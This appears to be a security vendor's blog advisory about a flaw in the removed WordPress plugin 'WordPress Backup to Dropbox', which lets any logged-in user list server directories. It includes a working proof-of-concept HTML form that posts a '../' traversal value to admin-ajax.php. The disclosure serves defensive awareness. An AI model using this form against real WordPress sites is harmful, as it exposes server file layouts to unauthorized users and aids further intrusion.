14 Feb

A Recently Closed Plugin Contains a Vulnerability That Allows Anyone Logged in to WordPress to View Directory Listings

Today we had somebody contact us asking if we had any insight in to why the plugin WordPress Backup to Dropbox was removed from the Plugin Directory (after seeing one of yesterday’s posts). Our guess on that would be that it has to do with the plugin no longer working, but while doing a quick look over the plugin we did find a vulnerability in it that allows anyone logged in to WordPress to view a list of files and directories in a directory on the server they specify.

The plugin makes the function backup_to_dropbox_file_tree() accessible to anyone logged in to WordPress through WordPress’ AJAX functionality:

add_action('wp_ajax_file_tree', 'backup_to_dropbox_file_tree');

That function will load up the file /Views/wpb2d-file-tree.php:

function backup_to_dropbox_file_tree()
    include 'Views/wpb2d-file-tree.php';

That file will list the files and directories located in specified directory on the server (as specified by the POST input “dir”).

Proof of Concept

The following proof of concept will return a listing of the files and directories in the root directory of the WordPress install, when logged in to WordPress. The contents of the resulting are hidden using “display: none” styling, so you either need to remove that styling or view the page’s source to see the results.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=file_tree" method="POST">
<input type="hidden" name="dir" value="../" />
<input type="submit" value="Submit" />

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service you can suggest/vote for the plugins you use to receive a security review from us. You can start using the service for free when you sign up now.

Leave a Reply

Your email address will not be published. Required fields are marked *